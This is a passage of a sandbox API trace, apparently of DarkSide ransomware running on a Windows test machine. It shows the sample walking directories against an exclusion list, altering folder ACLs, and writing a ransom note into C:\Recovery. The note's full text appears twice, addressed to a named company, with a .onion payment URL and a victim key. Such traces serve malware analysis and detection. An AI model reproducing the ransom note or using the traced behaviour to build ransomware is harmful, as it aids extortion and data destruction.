wcslen (_String="boot") returned 0x4 [0149.103] _wcsicmp (_Str1="google", _Str2="PerfLogs") returned -9 [0149.103] wcslen (_String="google") returned 0x6 [0149.103] _wcsicmp (_Str1="mozilla", _Str2="PerfLogs") returned -3 [0149.103] wcslen (_String="mozilla") returned 0x7 [0149.103] _wcsicmp (_Str1="program files", _Str2="PerfLogs") returned 13 [0149.104] wcslen (_String="program files") returned 0xd [0149.104] _wcsicmp (_Str1="program files (x86)", _Str2="PerfLogs") returned 13 [0149.104] wcslen (_String="program files (x86)") returned 0x13 [0149.104] _wcsicmp (_Str1="programdata", _Str2="PerfLogs") returned 13 [0149.104] wcslen (_String="programdata") returned 0xb [0149.104] _wcsicmp (_Str1="system volume information", _Str2="PerfLogs") returned 3 [0149.104] wcslen (_String="system volume information") returned 0x19 [0149.104] _wcsicmp (_Str1="tor browser", _Str2="PerfLogs") returned 4 [0149.104] wcslen (_String="tor browser") returned 0xb [0149.104] _wcsicmp (_Str1="windows.old", _Str2="PerfLogs") returned 7 [0149.104] wcslen (_String="windows.old") returned 0xb [0149.104] _wcsicmp (_Str1="intel", _Str2="PerfLogs") returned -7 [0149.104] wcslen (_String="intel") returned 0x5 [0149.104] _wcsicmp (_Str1="msocache", _Str2="PerfLogs") returned -3 [0149.104] wcslen (_String="msocache") returned 0x8 [0149.104] _wcsicmp (_Str1="perflogs", _Str2="PerfLogs") returned 0 [0149.104] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0b89fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0b89fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0149.104] _wcsicmp (_Str1="$recycle.bin", _Str2="Program Files") returned -76 [0149.104] wcslen (_String="$recycle.bin") returned 0xc [0149.104] _wcsicmp (_Str1="config.msi", _Str2="Program Files") returned -13 [0149.104] wcslen (_String="config.msi") returned 0xa [0149.104] _wcsicmp (_Str1="$windows.~bt", _Str2="Program Files") returned -76 [0149.104] wcslen (_String="$windows.~bt") returned 0xc [0149.104] _wcsicmp (_Str1="$windows.~ws", _Str2="Program Files") returned -76 [0149.104] wcslen (_String="$windows.~ws") returned 0xc [0149.104] _wcsicmp (_Str1="windows", _Str2="Program Files") returned 7 [0149.104] wcslen (_String="windows") returned 0x7 [0149.104] _wcsicmp (_Str1="appdata", _Str2="Program Files") returned -15 [0149.104] wcslen (_String="appdata") returned 0x7 [0149.104] _wcsicmp (_Str1="application data", _Str2="Program Files") returned -15 [0149.104] wcslen (_String="application data") returned 0x10 [0149.104] _wcsicmp (_Str1="boot", _Str2="Program Files") returned -14 [0149.104] wcslen (_String="boot") returned 0x4 [0149.104] _wcsicmp (_Str1="google", _Str2="Program Files") returned -9 [0149.104] wcslen (_String="google") returned 0x6 [0149.105] _wcsicmp (_Str1="mozilla", _Str2="Program Files") returned -3 [0149.105] wcslen (_String="mozilla") returned 0x7 [0149.105] _wcsicmp (_Str1="program files", _Str2="Program Files") returned 0 [0149.105] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0149.105] _wcsicmp (_Str1="$recycle.bin", _Str2="Program Files (x86)") returned -76 [0149.105] wcslen (_String="$recycle.bin") returned 0xc [0149.105] _wcsicmp (_Str1="config.msi", _Str2="Program Files (x86)") returned -13 [0149.105] wcslen (_String="config.msi") returned 0xa [0149.105] _wcsicmp (_Str1="$windows.~bt", _Str2="Program Files (x86)") returned -76 [0149.105] wcslen (_String="$windows.~bt") returned 0xc [0149.105] _wcsicmp (_Str1="$windows.~ws", _Str2="Program Files (x86)") returned -76 [0149.105] wcslen (_String="$windows.~ws") returned 0xc [0149.105] _wcsicmp (_Str1="windows", _Str2="Program Files (x86)") returned 7 [0149.105] wcslen (_String="windows") returned 0x7 [0149.105] _wcsicmp (_Str1="appdata", _Str2="Program Files (x86)") returned -15 [0149.105] wcslen (_String="appdata") returned 0x7 [0149.105] _wcsicmp (_Str1="application data", _Str2="Program Files (x86)") returned -15 [0149.105] wcslen (_String="application data") returned 0x10 [0149.105] _wcsicmp (_Str1="boot", _Str2="Program Files (x86)") returned -14 [0149.105] wcslen (_String="boot") returned 0x4 [0149.105] _wcsicmp (_Str1="google", _Str2="Program Files (x86)") returned -9 [0149.105] wcslen (_String="google") returned 0x6 [0149.105] _wcsicmp (_Str1="mozilla", _Str2="Program Files (x86)") returned -3 [0149.105] wcslen (_String="mozilla") returned 0x7 [0149.105] _wcsicmp (_Str1="program files", _Str2="Program Files (x86)") returned -32 [0149.105] wcslen (_String="program files") returned 0xd [0149.105] _wcsicmp (_Str1="program files (x86)", _Str2="Program Files (x86)") returned 0 [0149.105] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0149.105] _wcsicmp (_Str1="$recycle.bin", _Str2="ProgramData") returned -76 [0149.105] wcslen (_String="$recycle.bin") returned 0xc [0149.105] _wcsicmp (_Str1="config.msi", _Str2="ProgramData") returned -13 [0149.105] wcslen (_String="config.msi") returned 0xa [0149.105] _wcsicmp (_Str1="$windows.~bt", _Str2="ProgramData") returned -76 [0149.105] wcslen (_String="$windows.~bt") returned 0xc [0149.106] _wcsicmp (_Str1="$windows.~ws", _Str2="ProgramData") returned -76 [0149.106] wcslen (_String="$windows.~ws") returned 0xc [0149.106] _wcsicmp (_Str1="windows", _Str2="ProgramData") returned 7 [0149.106] wcslen (_String="windows") returned 0x7 [0149.106] _wcsicmp (_Str1="appdata", _Str2="ProgramData") returned -15 [0149.106] wcslen (_String="appdata") returned 0x7 [0149.106] _wcsicmp (_Str1="application data", _Str2="ProgramData") returned -15 [0149.106] wcslen (_String="application data") returned 0x10 [0149.106] _wcsicmp (_Str1="boot", _Str2="ProgramData") returned -14 [0149.106] wcslen (_String="boot") returned 0x4 [0149.106] _wcsicmp (_Str1="google", _Str2="ProgramData") returned -9 [0149.106] wcslen (_String="google") returned 0x6 [0149.106] _wcsicmp (_Str1="mozilla", _Str2="ProgramData") returned -3 [0149.106] wcslen (_String="mozilla") returned 0x7 [0149.106] _wcsicmp (_Str1="program files", _Str2="ProgramData") returned -68 [0149.106] wcslen (_String="program files") returned 0xd [0149.106] _wcsicmp (_Str1="program files (x86)", _Str2="ProgramData") returned -68 [0149.106] wcslen (_String="program files (x86)") returned 0x13 [0149.106] _wcsicmp (_Str1="programdata", _Str2="ProgramData") returned 0 [0149.106] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86977be0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x86977be0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x86977be0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.106] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.106] FindNextFileW (in: hFindFile=0x152ed8, lpFindFileData=0x32f51c | out: lpFindFileData=0x32f51c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0149.106] _wcsicmp (_Str1="$recycle.bin", _Str2="Recovery") returned -78 [0149.106] wcslen (_String="$recycle.bin") returned 0xc [0149.106] _wcsicmp (_Str1="config.msi", _Str2="Recovery") returned -15 [0149.106] wcslen (_String="config.msi") returned 0xa [0149.106] _wcsicmp (_Str1="$windows.~bt", _Str2="Recovery") returned -78 [0149.106] wcslen (_String="$windows.~bt") returned 0xc [0149.106] _wcsicmp (_Str1="$windows.~ws", _Str2="Recovery") returned -78 [0149.106] wcslen (_String="$windows.~ws") returned 0xc [0149.106] _wcsicmp (_Str1="windows", _Str2="Recovery") returned 5 [0149.106] wcslen (_String="windows") returned 0x7 [0149.106] _wcsicmp (_Str1="appdata", _Str2="Recovery") returned -17 [0149.106] wcslen (_String="appdata") returned 0x7 [0149.107] _wcsicmp (_Str1="application data", _Str2="Recovery") returned -17 [0149.107] wcslen (_String="application data") returned 0x10 [0149.107] _wcsicmp (_Str1="boot", _Str2="Recovery") returned -16 [0149.107] wcslen (_String="boot") returned 0x4 [0149.107] _wcsicmp (_Str1="google", _Str2="Recovery") returned -11 [0149.107] wcslen (_String="google") returned 0x6 [0149.107] _wcsicmp (_Str1="mozilla", _Str2="Recovery") returned -5 [0149.107] wcslen (_String="mozilla") returned 0x7 [0149.107] _wcsicmp (_Str1="program files", _Str2="Recovery") returned -2 [0149.107] wcslen (_String="program files") returned 0xd [0149.107] _wcsicmp (_Str1="program files (x86)", _Str2="Recovery") returned -2 [0149.107] wcslen (_String="program files (x86)") returned 0x13 [0149.107] _wcsicmp (_Str1="programdata", _Str2="Recovery") returned -2 [0149.107] wcslen (_String="programdata") returned 0xb [0149.107] _wcsicmp (_Str1="system volume information", _Str2="Recovery") returned 1 [0149.107] wcslen (_String="system volume information") returned 0x19 [0149.107] _wcsicmp (_Str1="tor browser", _Str2="Recovery") returned 2 [0149.107] wcslen (_String="tor browser") returned 0xb [0149.107] _wcsicmp (_Str1="windows.old", _Str2="Recovery") returned 5 [0149.107] wcslen (_String="windows.old") returned 0xb [0149.107] _wcsicmp (_Str1="intel", _Str2="Recovery") returned -9 [0149.107] wcslen (_String="intel") returned 0x5 [0149.107] _wcsicmp (_Str1="msocache", _Str2="Recovery") returned -5 [0149.107] wcslen (_String="msocache") returned 0x8 [0149.107] _wcsicmp (_Str1="perflogs", _Str2="Recovery") returned -2 [0149.107] wcslen (_String="perflogs") returned 0x8 [0149.107] _wcsicmp (_Str1="x64dbg", _Str2="Recovery") returned 6 [0149.107] wcslen (_String="x64dbg") returned 0x6 [0149.107] _wcsicmp (_Str1="public", _Str2="Recovery") returned -2 [0149.107] wcslen (_String="public") returned 0x6 [0149.107] _wcsicmp (_Str1="all users", _Str2="Recovery") returned -17 [0149.107] wcslen (_String="all users") returned 0x9 [0149.107] _wcsicmp (_Str1="default", _Str2="Recovery") returned -14 [0149.107] wcslen (_String="default") returned 0x7 [0149.107] wcscpy (in: _Dest=0x1661c8, _Source="\\\\?\\C:\\*" | out: _Dest="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0149.107] wcslen (_String="\\\\?\\C:\\*") returned 0x8 [0149.108] wcscpy (in: _Dest=0x1661d6, _Source="Recovery" | out: _Dest="Recovery") returned="Recovery" [0149.108] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x18efe0 [0149.108] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x19efe8 [0149.109] wcscpy (in: _Dest=0x18efe0, _Source="\\\\?\\C:\\Recovery" | out: _Dest="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0149.109] GetNamedSecurityInfoW () returned 0x0 [0149.109] SetEntriesInAclW () returned 0x0 [0149.109] SetNamedSecurityInfoW () returned 0x0 [0149.111] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x152f58) returned 1 [0149.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f06c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.111] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Recovery" (normalized: "c:\\recovery")) returned 1 [0149.112] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0149.112] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\recovery\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.112] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32f03c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32f03c*=0x7ca, lpOverlapped=0x0) returned 1 [0149.113] CloseHandle (hObject=0x1c) returned 1 [0149.113] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery" (normalized: "c:\\recovery")) returned 0x2016 [0149.113] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Recovery" | out: pszPath="\\\\?\\C:\\Recovery\\") returned="" [0149.114] wcslen (_String="\\\\?\\C:\\Recovery\\") returned 0x10 [0149.114] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Recovery\\*", fInfoLevelId=0x0, lpFindFileData=0x32f29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32f29c) returned 0x152f58 [0149.114] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8699dd40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8699dd40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.114] FindNextFileW (in: hFindFile=0x152f58, lpFindFileData=0x32f29c | out: lpFindFileData=0x32f29c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0149.114] _wcsicmp (_Str1="$recycle.bin", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -65 [0149.114] wcslen (_String="$recycle.bin") returned 0xc [0149.114] _wcsicmp (_Str1="config.msi", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -2 [0149.114] wcslen (_String="config.msi") returned 0xa [0149.114] _wcsicmp (_Str1="$windows.~bt", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -65 [0149.114] wcslen (_String="$windows.~bt") returned 0xc [0149.114] _wcsicmp (_Str1="$windows.~ws", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -65 [0149.114] wcslen (_String="$windows.~ws") returned 0xc [0149.114] _wcsicmp (_Str1="windows", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 18 [0149.114] wcslen (_String="windows") returned 0x7 [0149.115] _wcsicmp (_Str1="appdata", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0149.115] wcslen (_String="appdata") returned 0x7 [0149.115] _wcsicmp (_Str1="application data", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0149.115] wcslen (_String="application data") returned 0x10 [0149.115] _wcsicmp (_Str1="boot", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0149.115] wcslen (_String="boot") returned 0x4 [0149.115] _wcsicmp (_Str1="google", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 2 [0149.115] wcslen (_String="google") returned 0x6 [0149.115] _wcsicmp (_Str1="mozilla", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 8 [0149.115] wcslen (_String="mozilla") returned 0x7 [0149.115] _wcsicmp (_Str1="program files", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0149.115] wcslen (_String="program files") returned 0xd [0149.115] _wcsicmp (_Str1="program files (x86)", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0149.115] wcslen (_String="program files (x86)") returned 0x13 [0149.115] _wcsicmp (_Str1="programdata", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0149.115] wcslen (_String="programdata") returned 0xb [0149.115] _wcsicmp (_Str1="system volume information", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 14 [0149.115] wcslen (_String="system volume information") returned 0x19 [0149.115] _wcsicmp (_Str1="tor browser", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 15 [0149.115] wcslen (_String="tor browser") returned 0xb [0149.115] _wcsicmp (_Str1="windows.old", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 18 [0149.115] wcslen (_String="windows.old") returned 0xb [0149.115] _wcsicmp (_Str1="intel", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 4 [0149.115] wcslen (_String="intel") returned 0x5 [0149.115] _wcsicmp (_Str1="msocache", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 8 [0149.115] wcslen (_String="msocache") returned 0x8 [0149.116] _wcsicmp (_Str1="perflogs", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0149.116] wcslen (_String="perflogs") returned 0x8 [0149.116] _wcsicmp (_Str1="x64dbg", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 19 [0149.116] wcslen (_String="x64dbg") returned 0x6 [0149.116] _wcsicmp (_Str1="public", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0149.116] wcslen (_String="public") returned 0x6 [0149.116] _wcsicmp (_Str1="all users", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0149.116] wcslen (_String="all users") returned 0x9 [0149.116] _wcsicmp (_Str1="default", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -1 [0149.116] wcslen (_String="default") returned 0x7 [0149.116] wcscpy (in: _Dest=0x19efe8, _Source="\\\\?\\C:\\Recovery\\*" | out: _Dest="\\\\?\\C:\\Recovery\\*") returned="\\\\?\\C:\\Recovery\\*" [0149.116] wcslen (_String="\\\\?\\C:\\Recovery\\*") returned 0x11 [0149.116] wcscpy (in: _Dest=0x19f008, _Source="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0149.116] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1beff8 [0149.116] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1cf000 [0149.119] wcscpy (in: _Dest=0x1beff8, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0149.119] GetNamedSecurityInfoW () returned 0x0 [0149.119] SetEntriesInAclW () returned 0x0 [0149.119] SetNamedSecurityInfoW () returned 0x0 [0149.120] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1531a8) returned 1 [0149.120] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32edec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.121] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 1 [0149.121] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0149.121] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.121] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32edbc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32edbc*=0x7ca, lpOverlapped=0x0) returned 1 [0149.122] CloseHandle (hObject=0x1c) returned 1 [0149.122] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 0x2016 [0149.123] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: pszPath="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="" [0149.123] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 0x35 [0149.123] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", fInfoLevelId=0x0, lpFindFileData=0x32f01c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32f01c) returned 0x152f98 [0149.123] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x869c3ea0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x869c3ea0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.124] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0149.124] _wcsicmp (_Str1="boot.sdi", _Str2="README.c06622a1.TXT") returned 